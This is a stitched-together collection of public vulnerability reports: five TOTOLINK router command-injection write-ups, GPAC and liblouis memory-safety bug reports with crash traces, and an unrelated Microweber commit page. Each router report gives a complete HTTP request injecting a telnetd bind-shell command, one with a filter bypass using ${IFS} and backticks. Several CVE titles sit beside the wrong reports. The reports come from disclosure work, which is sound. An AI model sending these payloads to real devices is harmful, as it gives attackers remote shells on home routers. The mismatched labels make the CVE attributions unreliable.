Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUpgradeFW, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A830R、3100R、A950RG、A800R、A3000RU、A810R

Version:A830R\_Firmware(V5.9c.4729\_B20191112)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/184/ids/36.html)

A3100R\_Firmware(V4.1.2cu.5050\_B20200504)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/170/ids/36.html)

A950RG\_Firmware(V4.1.2cu.5161\_B20200903)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/167/ids/36.html)

A800R\_Firmware(V4.1.2cu.5137\_B20200730)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/166/ids/36.html)

A3000RU\_Firmware(V5.9c.5185\_B20201128)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/168/ids/36.html)

A810R\_Firmware)(V4.1.2cu.5182\_B20201026)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/169/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `upgrade.so` binary:

In `setUpgradeFW` function,`FileName` is directly passed by the attacker, so we can control the `FileName` to attack the OS.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_23/images/1.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

> Complete vulnerability verification on A830R product

**PoC**

We set `FileName` as **;telnetd -l /bin/sh -p 9999;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 109
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/top.asp?timestamp=1645506134
Cookie: SESSION\_ID=2:1645507767:2

{"topicurl":"setting/setUpgradeFW","FileName":";telnetd -l /bin/sh -p 9999;","Flags":"1","ContentLength":"1"}

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_23/images/2.png)

**Result**

Get a shell!

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_23/images/3.png)

CVE-2022-26210: my_vuln/23.md at main · pjqwudi1/my_vuln

Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setLanguageCfg, via the langType parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A830R、3100R、A950RG、A800R、A3000RU、A810R

Version:A830R\_Firmware(V5.9c.4729\_B20191112)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/184/ids/36.html)

A3100R\_Firmware(V4.1.2cu.5050\_B20200504)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/170/ids/36.html)

A950RG\_Firmware(V4.1.2cu.5161\_B20200903)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/167/ids/36.html)

A800R\_Firmware(V4.1.2cu.5137\_B20200730)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/166/ids/36.html)

A3000RU\_Firmware(V5.9c.5185\_B20201128)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/168/ids/36.html)

A810R\_Firmware)(V4.1.2cu.5182\_B20201026)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/169/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `global.so` binary:

In `setLanguageCfg` function,`langType` is directly passed by the attacker, so we can control the `langType` to attack the OS.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_27/images/1.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

> Complete vulnerability verification on A830R product

**PoC**

We set `langType` as **;telnetd -l /bin/sh -p 10003;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 95
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/title.asp
Cookie: SESSION\_ID=2:1645512073:2

{"topicurl":"setting/setLanguageCfg","langType":";telnetd -l /bin/sh -p 10003;","langFlag":"1"}

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_27/images/2.png)

**Result**

Get a shell!

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_27/images/3.png)

CVE-2022-26206: my_vuln/27.md at main · pjqwudi1/my_vuln

Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDiagnosisCfg, via the ipDoamin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A830R、3100R、A950RG、A800R、A3000RU、A810R

Version:A830R\_Firmware(V5.9c.4729\_B20191112)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/184/ids/36.html)

A3100R\_Firmware(V4.1.2cu.5050\_B20200504)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/170/ids/36.html)

A950RG\_Firmware(V4.1.2cu.5161\_B20200903)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/167/ids/36.html)

A800R\_Firmware(V4.1.2cu.5137\_B20200730)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/166/ids/36.html)

A3000RU\_Firmware(V5.9c.5185\_B20201128)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/168/ids/36.html)

A810R\_Firmware)(V4.1.2cu.5182\_B20201026)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/169/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `system.so` binary:

In `setDiagnosisCfg` function,`ipDoamin` is directly passed by the attacker, so we can control the `ipDoamin` to attack the OS.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_28/images/1.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

BUT!!!!!

**When receiving user input, there are very strict checks. But we can use `${}` and \`\` to bypass it!**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

> Complete vulnerability verification on A830R product

**PoC**

We set `ipDoamin` as **`telnetd${IFS}-l${IFS}/bin/sh${IFS}-p${IFS}10004`** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/adm/ntp.asp?timestamp=1645512861684
Cookie: SESSION\_ID=2:1645512852:2

{"topicurl":"setting/setDiagnosisCfg","ipDoamin":"\`telnetd${IFS}-l${IFS}/bin/sh${IFS}-p${IFS}10004\`"}

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_28/images/2.png)

**Result**

Get a shell!

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_28/images/3.png)

CVE-2022-26207: my_vuln/28.md at main · pjqwudi1/my_vuln

Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setWebWlanIdx, via the webWlanIdx parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A830R、3100R、A950RG、A800R、A3000RU、A810R

Version:A830R\_Firmware(V5.9c.4729\_B20191112)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/184/ids/36.html)

A3100R\_Firmware(V4.1.2cu.5050\_B20200504)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/170/ids/36.html)

A950RG\_Firmware(V4.1.2cu.5161\_B20200903)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/167/ids/36.html)

A800R\_Firmware(V4.1.2cu.5137\_B20200730)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/166/ids/36.html)

A3000RU\_Firmware(V5.9c.5185\_B20201128)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/168/ids/36.html)

A810R\_Firmware)(V4.1.2cu.5182\_B20201026)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/169/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `wireless.so` binary:

In `setWebWlanIdx` function,`webWlanIdx` is directly passed by the attacker, so we can control the `webWlanIdx` to attack the OS.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_22/images/1.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

> Complete vulnerability verification on A830R product

**PoC**

We set `webWlanIdx` as **`telnetd -l /bin/sh -p 8888`** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 80
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/top.asp?timestamp=1645506134
Cookie: SESSION\_ID=2:1645506134:2

{"topicurl":"setting/setWebWlanIdx","webWlanIdx":"\`telnetd -l /bin/sh -p 8888\`"}

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_22/images/2.png)

**Result**

Get a shell!

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_22/images/3.png)

CVE-2022-26208: my_vuln/22.md at main · pjqwudi1/my_vuln

Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUploadSetting, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A830R、3100R、A950RG、A800R、A3000RU、A810R

Version:A830R\_Firmware(V5.9c.4729\_B20191112)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/184/ids/36.html)

A3100R\_Firmware(V4.1.2cu.5050\_B20200504)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/170/ids/36.html)

A950RG\_Firmware(V4.1.2cu.5161\_B20200903)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/167/ids/36.html)

A800R\_Firmware(V4.1.2cu.5137\_B20200730)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/166/ids/36.html)

A3000RU\_Firmware(V5.9c.5185\_B20201128)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/168/ids/36.html)

A810R\_Firmware)(V4.1.2cu.5182\_B20201026)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/169/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `upgrade.so` binary:

In `setUploadSetting` function,`FileName` is directly passed by the attacker, so we can control the `FileName` to attack the OS.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_24/images/1.png)

In `libcstelib.so` binary:

Function `popen` is called internally in function `getCmdStr`.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_24/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

> Complete vulnerability verification on A830R product

**PoC**

We set `FileName` as **`telnetd -l /bin/sh -p 10000`** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 102
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/top.asp?timestamp=1645506134
Cookie: SESSION\_ID=2:1645507767:2

{"topicurl":"setting/setUploadSetting","FileName":"\`telnetd -l /bin/sh -p 10000\`","ContentLength":"1"}

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_24/images/3.png)

**Result**

Get a shell!

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_24/images/4.png)

CVE-2022-26209: my_vuln/24.md at main · pjqwudi1/my_vuln

GPAC 1.0.1 is affected by Use After Free through MP4Box.

    Proof of Concept
    
    Version:
    
    MP4Box - GPAC version 1.1.0-DEV-rev1646-gddd7990bb-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --prefix=/home/aidai/fuzzing/gpac/
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    
    System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
    
    poc
    
    base64 poc
    //7/AGUKCio=
    
    command:
    
    ./MP4Box -info poc
    
    Result
    
    =================================================================
    ==1529455==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001a1a at pc 0x00000043e343 bp 0x7ffeafafa9a0 sp 0x7ffeafafa158
    READ of size 11 at 0x602000001a1a thread T0
        #0 0x43e342 in StrstrCheck(void*, char*, char const*, char const*) (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x43e342)
        #1 0x43e171 in strstr (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x43e171)
        #2 0x7f61341e32d7 in ctxload_probe_data /home/aidai/fuzzing/gpac/gpac-asan/src/filters/load_bt_xmt.c:837:6
        #3 0x7f6134037b52 in gf_filter_pid_raw_new /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter.c:3777:13
        #4 0x7f6134153a31 in filein_process /home/aidai/fuzzing/gpac/gpac-asan/src/filters/in_file.c:481:7
        #5 0x7f6134030e3a in gf_filter_process_task /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter.c:2515:7
        #6 0x7f613401015f in gf_fs_thread_proc /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter_session.c:1756:3
        #7 0x7f613400de3e in gf_fs_run /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter_session.c:2000:2
        #8 0x7f6133c4d27e in gf_media_import /home/aidai/fuzzing/gpac/gpac-asan/src/media_tools/media_import.c:1218:3
        #9 0x524fe4 in convert_file_info /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/fileimport.c:128:6
        #10 0x4f45c2 in mp4boxMain /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/main.c:6063:6
        #11 0x7f61332740b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #12 0x429b7d in _start (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x429b7d)
    
    0x602000001a1a is located 0 bytes to the right of 10-byte region [0x602000001a10,0x602000001a1a)
    allocated by thread T0 here:
        #0 0x4a22bd in malloc (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x4a22bd)
        #1 0x7f613372a4fb in gf_utf_get_utf8_string_from_bom /home/aidai/fuzzing/gpac/gpac-asan/src/utils/utf.c:680:14
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x43e342) in StrstrCheck(void*, char*, char const*, char const*)
    Shadow bytes around the buggy address:
      0x0c047fff82f0: fa fa 00 00 fa fa 04 fa fa fa 04 fa fa fa 00 00
      0x0c047fff8300: fa fa 00 00 fa fa 04 fa fa fa 00 00 fa fa 06 fa
      0x0c047fff8310: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff8320: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 00
      0x0c047fff8330: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa fd fd
    =>0x0c047fff8340: fa fa 00[02]fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1529455==ABORTING

CVE-2022-24576: Heap-based Buffer Overflow · Issue #2061 · gpac/gpac

GPAC 1.0.1 is affected by a stack-based buffer overflow through MP4Box.

CVE-2022-24575: Use After Free · Issue #2058 · gpac/gpac

Liblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c).

**Describe the bug**  
There is a global-buffer-overflow bug found in compilePassOpcode, can be triggered via lou\_checktable+ ASan

**To Reproduce**  
Steps to reproduce the behavior:

    export CC=clang && export CFLAGS="-fsanitize=address -g"
    ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
    ./tools/lou_checktable  POC
    
    

Output:

    ==17764==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000102f062 at pc 0x00000051d4ce bp 0x7ffdfad96390 sp 0x7ffdfad96388
    WRITE of size 2 at 0x00000102f062 thread T0
        #0 0x51d4cd in compilePassOpcode /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31
        #1 0x50f7bf in compileRule /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:3947:11
        #2 0x4ff42b in compileFile /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4660:9
        #3 0x4fbbe9 in compileTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4767:9
        #4 0x4f9bdf in getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4939:7
        #5 0x4f9061 in _lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4848:2
        #6 0x4fb51f in lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4860:2
        #7 0x4f4109 in main /benchmark/vulnerable/liblouis/tools/lou_checktable.c:114:16
        #8 0x7f6ff64f0bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #9 0x41b699 in _start (/benchmark/vulnerable/liblouis/tools/lou_checktable+0x41b699)
    
    0x00000102f062 is located 0 bytes to the right of global variable 'passRuleDots' defined in 'compileTranslationTable.c:1850:21' (0x102e060) of size 4098
    SUMMARY: AddressSanitizer: global-buffer-overflow /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31 in compilePassOpcode
    Shadow bytes around the buggy address:
      0x0000801fddb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fdde0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0000801fde00: 00 00 00 00 00 00 00 00 00 00 00 00[02]f9 f9 f9
      0x0000801fde10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==17764==ABORTING
    

**System**

OS: Ubuntu  
OS version : can be reproduced in 18.04/20.04  
clang version: 12.0.1 (release/12.x)  
liblouis Version : latest commit 4d73c81

**Credit**  
NCNIPC of China  
Hexhive

**POC**  
POC.zip

CVE-2022-26981: [BUG] global-buffer-overflow in lou_checktable · Issue #1171 · liblouis/liblouis

**Describe the bug**  
There is a global-buffer-overflow bug found in compilePassOpcode, can be triggered via lou\_checktable+ ASan

**To Reproduce**  
Steps to reproduce the behavior:

    export CC=clang && export CFLAGS="-fsanitize=address -g"
    ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
    ./tools/lou_checktable  POC
    
    

Output:

    ==17764==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000102f062 at pc 0x00000051d4ce bp 0x7ffdfad96390 sp 0x7ffdfad96388
    WRITE of size 2 at 0x00000102f062 thread T0
        #0 0x51d4cd in compilePassOpcode /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31
        #1 0x50f7bf in compileRule /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:3947:11
        #2 0x4ff42b in compileFile /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4660:9
        #3 0x4fbbe9 in compileTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4767:9
        #4 0x4f9bdf in getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4939:7
        #5 0x4f9061 in _lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4848:2
        #6 0x4fb51f in lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4860:2
        #7 0x4f4109 in main /benchmark/vulnerable/liblouis/tools/lou_checktable.c:114:16
        #8 0x7f6ff64f0bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #9 0x41b699 in _start (/benchmark/vulnerable/liblouis/tools/lou_checktable+0x41b699)
    
    0x00000102f062 is located 0 bytes to the right of global variable 'passRuleDots' defined in 'compileTranslationTable.c:1850:21' (0x102e060) of size 4098
    SUMMARY: AddressSanitizer: global-buffer-overflow /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31 in compilePassOpcode
    Shadow bytes around the buggy address:
      0x0000801fddb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fdde0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0000801fde00: 00 00 00 00 00 00 00 00 00 00 00 00[02]f9 f9 f9
      0x0000801fde10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==17764==ABORTING
    

**System**

OS: Ubuntu  
OS version : can be reproduced in 18.04/20.04  
clang version: 12.0.1 (release/12.x)  
liblouis Version : latest commit 4d73c81

**Acknowledgement**  
nipc

**POC**  
POC.zip

XSS on dynamic_text module in GitHub repository microweber/microweber prior to 1.2.11.

Permalink

Browse files

Update build-and-upload.yml

*   Loading branch information

![@bobimicroweber](https://avatars.githubusercontent.com/u/50577633?s=40&v=4)

bobimicroweber committed

Mar 11, 2022

1 parent 095b1bc commit de6d17b52d261902653fbdd2ecefcaac82e54256

Showing with **0 additions** and **1 deletion**.

1.  +0 −1 .github/workflows/build-and-upload.yml

1 .github/workflows/build-and-upload.yml

Show comments View file

@@ -6,7 +6,6 @@ on:

jobs:

microweber-test-before-build:

runs-on: ubuntu-latest

needs: stop-previous-runs

steps:

\- uses: actions/checkout@v2

  

**0 comments on commit `de6d17b`**

Please sign in to comment.

Tag

#ubuntu